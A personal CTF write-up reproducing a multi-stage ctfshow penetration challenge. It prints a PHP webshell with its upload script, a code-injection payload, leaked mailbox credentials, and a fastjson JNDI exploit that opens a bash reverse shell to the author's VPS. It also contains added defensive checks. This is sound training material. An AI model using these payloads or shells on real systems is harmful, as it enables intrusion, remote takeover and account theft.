ctfshow RealWorldCTF Penetration Tournament (2nd edition): reproduction wp

Because this is not the official wp but a reproduction that follows the official wp (commonly known as doing the problem by looking at the answer), it is called an unofficial reproduction wp (

For this challenge I can only say that I didn't know how to do it and just watched the fun. I matched several times on the anonymous chat site, but never matched the group owner who was handing out the noob toys. Later, because the platform kept getting broken, the webmaster replaced the getshell in Scene 1 with an information leak (it should have been changed back after the game). I saw the leaked username and password, but found they were useless for entering the admin panel of the anonymous chat site, so I just slacked off (

Later, after reading the official wp, I realized that the username and password had to be used to log in to the real 163 mailbox. That was really unexpected, wow~

Alright, that's enough rambling. Before the platform is closed (it's been over 72 hours; did our beloved webmaster forget...), let me hurry up and write (pad out) a blog post!

Table of Contents

  • Scene One
    • 1. Information collection
      • 1) Find the project name
      • 2) Search for the project name on GitHub
    • 2. Source code audit
    • 3. getshell
      • 1) Upload the file with a Python script
      • 2) AntSword connection
    • 4. Get an account
  • Scene Two
    • 1. Log in to the mailbox and check the mail
    • 2. Open the encrypted email with a weak password
    • 3. Get the address of the new scene
  • Scene Three
    • Source code audit
  • Scene Four
    • 1. getshell
      • 1) Log in to get the cookie
      • 2) Upload the file with a Python script
      • 3) AntSword connection
    • 2. Intranet scanning
      • 1) Get the current IP
      • 2) Find the live host
      • 3) Find the fastjson port
    • 3. Lateral movement
      • 1) Start the listener and specify the rebound port in one step
      • 2) Listen for the rebound shell
      • 3) Create new files on the server connected via AntSword
      • 4) Execute commands in AntSword's virtual terminal
      • 5) Rebound shell received
  • Postscript

Scene One

1. Information collection

1) Find the project name

Opening Scene 1 shows an anonymous chat website. I remembered the idea from the official wp of the "first" penetration tournament: use the project name shown at the bottom of the site to find its source code on GitHub. So I clicked "Help" at the bottom of the site to see whether it gives away any information.
[Screenshot: the help information]
I then saw the project name at the bottom of the help documentation page: Anonymous-Chat-Room
[Screenshot: the project name]

2) Search for the project name on GitHub

Here we need to search across all of GitHub, and the first result is it! Click in to see the source code.
[Screenshot: the project found on GitHub]

2. Source code audit

Seeing so many files, if you asked me to do a source code audit I really couldn't read through them all. Maybe it gets better with more reading and more experience; the premise is actually reading more...
I learned from the official wp that the vulnerable source is in Anonymous-Chat-Room/client/photo_upload.php. Later, reading other masters' wps, I learned that the chat interface has a picture upload feature; by capturing the request you can see that photo_upload.php has a problem: an arbitrary file upload vulnerability. I feel it is much easier and faster to find problems starting from a feature than by reading the code file by file: first capture and analyze specific feature points, locate the vulnerable files, and then read the source code of those files in a targeted way. Learned a lot.
And from the source code you can also see that uploaded files are saved under images/photo/, so next you can upload a one-sentence Trojan~
[Screenshot: source code audit showing the vulnerability]
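From the defender's side, the upload in this scene goes through because the handler trusts what the client declares (the script below sends a file named 1.php with a Content-Type of image/gif) instead of what was actually uploaded. The following is an added example, not code from Anonymous-Chat-Room or from the official wp, of the check a photo upload handler should make: an extension allowlist, a signature check on the real bytes, and a server-chosen filename. The function names, the signature table and the test inputs are constructed for this example; I have not seen the real photo_upload.php, so its exact check is an assumption.

```python
import secrets
from pathlib import Path
from typing import Tuple

# Extension allowlist and the file signature each extension must start with.
# Constructed for this example; add formats as the site needs them.
IMAGE_SIGNATURES = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}


def check_upload(client_name: str, client_type: str, data: bytes) -> Tuple[bool, str]:
    """Decide whether an uploaded 'photo' is acceptable.

    Returns (True, server_filename) or (False, reason). The client-supplied
    filename and Content-Type are hints only; the decision rests on the
    extension allowlist and on the bytes that were actually uploaded.
    """
    ext = Path(client_name).suffix.lower().lstrip(".")
    if ext not in IMAGE_SIGNATURES:
        return False, f"extension not allowed: {ext or '(none)'}"
    if not data.startswith(IMAGE_SIGNATURES[ext]):
        return False, "file content does not match the declared image type"
    if not client_type.lower().startswith("image/"):
        return False, f"unexpected Content-Type: {client_type}"
    # The server picks the stored name: a random token plus the validated
    # extension, so the client can never choose ".php" or smuggle in a path.
    return True, f"{secrets.token_hex(8)}.{ext}"


def save_photo(upload_dir: str, client_name: str, client_type: str, data: bytes) -> Path:
    """Validate and store one upload; raises ValueError with the rejection reason."""
    ok, result = check_upload(client_name, client_type, data)
    if not ok:
        raise ValueError(result)
    dest = Path(upload_dir) / result
    dest.write_bytes(data)
    return dest


if __name__ == "__main__":
    # Constructed inputs: the writeup's 1.php-as-image/gif trick, and a real GIF header.
    print(check_upload("1.php", "image/gif", b"<?php eval($_POST[1]); ?>"))
    print(check_upload("photo.gif", "image/gif", b"GIF89a" + b"\x00" * 16))
```

The signature check alone is not enough: a file that starts with a valid GIF header and carries PHP after it still passes, so the web server must also be configured not to execute scripts from images/photo/ (for example, no PHP handler for that directory), and the stored name must never come from the client.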

3. getshell

1) Upload the file with a Python script

First create a new file 1.txt whose content is the one-sentence Trojan:

<?php eval($_POST[1]); ?>

Then upload it as a PHP file with the help of a Python script. Here is the Python script from the official wp; note that the file type sent here must satisfy the check seen in the source code above.

import requests

url = "https://i.am.ctfer.com/photo_upload.php"

# Send the local file 1.txt under the name 1.php while declaring a GIF content type
files = {'file': ('1.php', open('1.txt', 'rb'), 'image/gif', {'Expires': '0'})}

response = requests.post(url=url, files=files)

print(response.text)

Running this script prints the name of the file as saved on the server (that is, the body of the response); here it is 64103df7e47051.php. As for where the file is saved: under images/photo/, as seen in the source code above. Then you can move on to AntSword and try whether it connects.

2) AntSword connection

[Screenshot: connected successfully]

Of course, you don't need a Python script; uploading with Burp works the same. In the chat window, send a file containing the one-sentence Trojan with a picture extension (such as jpg), intercept or resend it in Burp, and change the extension to php. This is what I tried in Burp later:
[Screenshot: uploading the file with Burp]

4. Get an account

Based on my limited experience, the next step is to look for login information on this server. My instinct was to go to /var/www/html/, and there I saw login.php in that path. Opening it, there it is. So we got:
Username: [email protected]
Password: Hacker_ctfsh0w
[Screenshot: a set of username and password]

Although Scene 1 has a website admin panel, logging in there was useless at the time, and it is indeed not the point being tested. The correct next step is to log in to the real 163 mailbox.

Scene Two

1. Log in to the mailbox and check the mail

Username: [email protected]
Password: Hacker_ctfsh0w
[Screenshot: logging in to the 163 mailbox]
Notice the rather "suspicious" email "ctfshow entry notice"
[Screenshot: the suspicious email after logging in]

2. Open the encrypted email with a weak password

Opening the email, I found it is an encrypted email; the weak password 123456 opens it
[Screenshot: the email asks for a password]

3. Get the address of the new scene

After opening the email, two new addresses appear
[Screenshot: the new scene addresses]

Scene Three

Source code audit

Open the "development address" in the email; after logging in with the login key, you can see the source code of the xblog application. From the official wp, there is an upload vulnerability in /c/t.php: there is a logic problem with $d, which is written into a PHP file without any filtering.
I really couldn't have seen it; this step is too bold (referring to the bold guess and bold attempt needed to make this step
[Screenshot: xblog source code audit]
And here you can getshell directly in the VS Code terminal. Although I don't know what getshell is for here, I didn't know you could do this in VS Code before!
[Screenshot: getshell in the VS Code terminal]

Scene Four

1. getshell

1) Log in to get the cookie

Opening https://blog.ctfer.com/ directly looks like this
[Screenshot: opening the blog link]
According to the official wp, you need to log in at https://blog.ctfer.com/a/
As for why login goes through /a/, it can probably be learned from the code audit in "Scene 3"? You can see login-related code in /a/index.php
[Screenshot: login-related source code under a/]
[Screenshot: source code under a/]
Then go to https://blog.ctfer.com/a/
You see the following interface; enter admin:123456
[Screenshot: the login interface]
Then, in the next interface, enter admin:123456 again to log in
[Screenshot: entering the username and password again]

One thing I don't quite understand: sometimes when I visit https://blog.ctfer.com/a/, the interface in the picture above appears directly (that is, the "detected that this is your first visit" interface from the earlier picture is gone), and entering admin:123456 there prompts "Verification Error". Sometimes clearing the browser cache and quitting and reopening the browser gives the same result, and you have to wait a short while before it returns to normal... However, when things go smoothly, even if the login state is lost, you can simply refresh and log in again, and the cookie after login does not change. I don't understand it.

After a normal login it looks like this, and you enter an editing interface:
[Screenshot: the editing interface after login]
What we mainly want is the cookie of the successful login, which can be found and copied from the "Network" tab of the browser developer tools
[Screenshot: getting the login cookie]
You can see that the cookie here is 85be88a3bfcf87c0c32a86acf746a419; it needs to be put into the Python script in the next step.

2) Upload the file with a Python script

The script comes from the official wp; just replace the cookie with the one from your own login.
Note that the value of dat starts with "; (which closes the string that $d is written into), followed by eval($_POST[1])

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2023-03-09 11:05:32
# @Last Modified by: h1xa
# @Last Modified time: 2023-03-09 11:38:22
# @email: [email protected]
# @link: https://ctfer.com

import requests

url = "https://blog.ctfer.com/c/t.php"

# Session cookie copied from the browser after logging in at /a/
cookie = {
    "PHPSESSID": "85be88a3bfcf87c0c32a86acf746a419"
}

# dat is written into a PHP file unfiltered; the leading "; closes the string
data = {
    "dat": '";eval($_POST[1]);?>',
    "title": "1",
    "content": " ",
}

response = requests.post(url=url + "?type=submit", data=data, cookies=cookie)

print(response.text)

Run the script; when the file is uploaded successfully, the printed result is:
[Screenshot: the PHP file has been uploaded]
The uploaded file is saved at /p/0.php; this is also learned from the code audit of "Scene 3", so a screenshot is placed here~ (sometimes "pid": 1 may appear instead, probably because someone else uploaded a file just before this?
[Screenshot: save path of the uploaded file]
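The root cause in Scene 3 and here is the same: a submitted value ($d in /c/t.php) is concatenated straight into PHP source, so a value beginning with "; ends the string and everything after it becomes code. The following is an added example, not code from xblog or from the official wp, that shows the naive concatenation next to the minimum safe form (a single-quoted PHP literal with the two significant characters escaped) and a small scanner that checks whether submitted text ended up outside of a string literal. The function names, the template shape "$d = ...;" and the sample value are constructed for this example; I have not seen xblog's actual code, so the template is an assumption. The real fix is stronger still: store user content in a database or a data file, never in executable PHP.

```python
def naive_embed(value: str) -> str:
    """The pattern the writeup describes: the value is pasted into PHP source as-is."""
    return '<?php\n$d = "' + value + '";\n'


def php_single_quoted(value: str) -> str:
    """Render value as a PHP single-quoted literal; only backslash and quote are special."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def safe_embed(value: str) -> str:
    """Same template, but the value is always emitted as a proper string literal."""
    return "<?php\n$d = " + php_single_quoted(value) + ";\n"


def code_outside_strings(src: str) -> str:
    """Minimal scanner: drop the contents of PHP string literals, keep everything else.

    Backslash escapes are skipped (\\' and \\\\ in single quotes, any escape in
    double quotes), so an escaped quote never terminates a literal early.
    """
    out = []
    i, n = 0, len(src)
    while i < n:
        ch = src[i]
        if ch in ("'", '"'):
            quote = ch
            i += 1
            while i < n and src[i] != quote:
                if src[i] == "\\":
                    i += 1  # skip the escaped character
                i += 1
            i += 1  # step past the closing quote
            out.append(quote + quote)  # leave an empty literal as a marker
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def contains_code_injection(src: str) -> bool:
    """True if an eval( call survives outside every string literal of the generated file."""
    return "eval(" in code_outside_strings(src)


# Constructed sample: the value the writeup's script submits as "dat".
SUBMITTED_VALUE = '";eval($_POST[1]);?>'

if __name__ == "__main__":
    print(naive_embed(SUBMITTED_VALUE))   # eval() is now executable code
    print(safe_embed(SUBMITTED_VALUE))    # eval() is just text inside a literal
```

The scanner is only a checking aid for the two templates above; it is not a PHP parser and does not handle heredocs or comments. Its point is to make the difference observable: with naive_embed the submitted text becomes a statement, with safe_embed it stays data.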

3) AntSword connection

[Screenshot: AntSword connected successfully]

2. Intranet scanning

(But I don't know how to scan, so I will just briefly record the reproduction results

1) Get the current IP

Execute a command in AntSword's virtual terminal:
ip addr show
This shows that the intranet address of the current host is 192.168.102.3 (sometimes it may be .2)
[Screenshot: viewing the IP]

2) Find the live host

Execute ping 192.168.102.2 -c 1
The result shows no packet loss, so the live host 192.168.102.2 was found (if the previous step gave .2, then this step is .3, you know)
(I don't know how to scan here... fortunately it can be tried out during the reproduction
[Screenshot: finding the live host]

3) Find the fastjson port

Execute curl http://192.168.102.2:8090
This shows that port 8090 is a fastjson service
[Screenshot: the fastjson port exists]

3. Lateral movement

The following part is the hardest for me. For masters familiar with nday vulnerabilities, reproducing the fastjson vulnerability is routine, but for me it was hard to reproduce (holding back tears, can't help it, can't bear it, wow T o T
Let me state the result first: I did not reproduce it by following the official wp's steps, because my intermediate process did not completely follow the official wp. I temporarily borrowed a colleague's VPS, which could not run javac, so I ran the javac command on my own machine (macOS) first and then put the generated class file on the VPS. This may have caused problems due to cross-platform differences; after countless attempts, that is the most likely reason I have found... During this process, a very capable boss kept guiding me. He was very patient, explaining the details and helping me analyze the causes. I am really grateful to him.

Later my colleague (a hard-grinding one) said he got it done, and his method differs slightly, so I'll record the method I learned from him here:

1) Start the listener and specify the rebound port in one step

This should save the steps in the official wp of generating the malicious class and hosting it on the VPS, and avoids the cross-platform problem with my class file. Of course, this does not mean the official wp's method is bad. The few fastjson reproduction articles I read before all follow the official wp's steps; the main reason is simply that I still couldn't get it right after trying...

The following method uses one command to do both starting the listener and specifying the rebound port (is that the right way to say it?

First download fastjson_tool.jar to the VPS, then execute the command in its directory:

java -cp fastjson_tool.jar fastjson.HLDAPServer <vps public ip> 3389 "bash -c {echo,<base64 of the command to execute>}|{base64,-d}|{bash,-i}"

The command executed after echo is
bash -i >& /dev/tcp/<vps ip>/9999 0>&1
The base64 encoding of this command can be obtained with a tool. The listening port and the final rebound port I use are the same as in the official wp: 3389 and 9999 respectively
[Screenshot: base64-encoded command to execute]

2) Listen for the rebound shell

Open another SSH window and execute the command nc -lvvnp 9999

3) Create new files on the server connected via AntSword

Create two new files, x.json and a.sh, on the server connected via AntSword. They are roughly the same as in the official wp; you need to replace the VPS address with your own, and in the value of "dataSourceName", the leading ldap and the trailing Object are rmi and Exploit in the official wp.
If the AntSword connection breaks, log in again, upload the one-sentence Trojan again, and then test the connection.

Contents of x.json:
{
    "e": {
        "@type": "java.lang.Class",
        "val": "com.sun.rowset.JdbcRowSetImpl"
    },
    "f": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "ldap://<vps address>:3389/Object",
        "autoCommit": true
    }
}

The content of a.sh is the same as in the official wp:
curl -X POST -H 'content-type:application/json' http://192.168.102.2:8090/ -d @x.json
Note that the IP here is the intranet IP of the "live host" from earlier; it may turn out to be .3
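What makes the x.json above work is fastjson's autoType: the "@type" key tells the parser which class to instantiate, and a JdbcRowSetImpl whose dataSourceName points at an LDAP or RMI URL performs a JNDI lookup when autoCommit is set. From the defender's side those three things are exactly what to look for in request bodies reaching a fastjson endpoint. The following is an added example, not code from the official wp or from the fastjson project, of a small inspector that walks a JSON body and reports "@type" hints, known gadget class names and JNDI URLs. The function names, the (deliberately short) gadget list and the two sample bodies are constructed for this example; the VPS host in the sample is a placeholder.

```python
import json
from typing import List

# Class names that fastjson autoType must never instantiate from untrusted input.
# The first is the one the writeup's x.json names; the others are two well-known
# DataSource gadgets. Constructed for this example, not a complete catalogue.
GADGET_CLASSES = {
    "com.sun.rowset.JdbcRowSetImpl",
    "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
    "com.mchange.v2.c3p0.JndiRefForwardingDataSource",
}

# URL schemes that cause a JNDI lookup when they reach a DataSource-style setter.
JNDI_SCHEMES = {"ldap", "ldaps", "rmi", "iiop"}


def inspect_fastjson_body(body: str) -> List[str]:
    """Return findings for one JSON request body; an empty list means nothing was flagged."""
    try:
        doc = json.loads(body)
    except ValueError:
        return ["body is not valid JSON"]
    findings: List[str] = []

    def walk(node, path: str) -> None:
        if isinstance(node, dict):
            for key, value in node.items():
                here = f"{path}.{key}" if path else key
                if key == "@type":
                    # Any @type is an autoType hint; a gadget class is the worst case.
                    if isinstance(value, str) and value in GADGET_CLASSES:
                        findings.append(f"{here}: @type names gadget class {value}")
                    else:
                        findings.append(f"{here}: autoType hint {value!r}")
                elif isinstance(value, str):
                    if value in GADGET_CLASSES:
                        findings.append(f"{here}: value names gadget class {value}")
                    elif "://" in value and value.split("://", 1)[0].lower() in JNDI_SCHEMES:
                        findings.append(f"{here}: JNDI URL {value}")
                walk(value, here)
        elif isinstance(node, list):
            for i, item in enumerate(node):
                walk(item, f"{path}[{i}]")

    walk(doc, "")
    return findings


def is_suspicious(body: str) -> bool:
    """Convenience wrapper for a WAF rule or a log pipeline: block or alert when True."""
    return bool(inspect_fastjson_body(body))


# Constructed samples: the writeup's x.json with a placeholder host, and a benign post.
X_JSON = json.dumps({
    "e": {"@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"},
    "f": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "ldap://vps.example:3389/Object",
        "autoCommit": True,
    },
})
BENIGN = json.dumps({"title": "hello", "content": "first post", "tags": ["a", "b"],
                     "link": "https://example.com/"})

if __name__ == "__main__":
    for line in inspect_fastjson_body(X_JSON):
        print(line)
    print("benign:", inspect_fastjson_body(BENIGN))
```

Inspection like this is a detection aid, not the fix. The fix on the application side is to upgrade fastjson and turn on safeMode (fastjson 1.2.68 and later; for example the JVM property -Dfastjson.parser.safeMode=true), which disables autoType entirely, and on the network side to block outbound LDAP and RMI from application servers so a lookup to an attacker-controlled host cannot complete.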

4) Execute commands in AntSword's virtual terminal

First give a.sh execute permission, then run it:
chmod u+x a.sh
./a.sh >2.txt
cat 2.txt
The result is as follows:
[Screenshot: executing ./a.sh]

5) Rebound shell received

Check the SSH window that is listening for the rebound: the shell has come back. There was no /root/flag.txt during the reproduction, so I just took a look with ls, and the reproduction ends here.
[Screenshot: the rebound shell]

Postscript

Thanks again for the help of a super big boss; I feel very happy. Thanks to my colleague for lending me a VPS and taking time out of a busy schedule to reproduce the final lateral movement of this challenge and teach me. Thanks to the ctfshow webmaster for providing such a fun penetration game and a detailed official wp, so that noobs like me can reproduce it.

I really rambled too much... Writing a blog post is so tiring. Because some of the content in the middle is still not really understood, there may be some wrong statements; criticism and corrections are welcome. I am really too weak. Once you accept your own weakness, is that giving up? Or can you put down the burden in your heart and concentrate on making yourself stronger? Can hard work really make you stronger? Comparison is the thief of joy; I wish to hold on to every inch of happiness.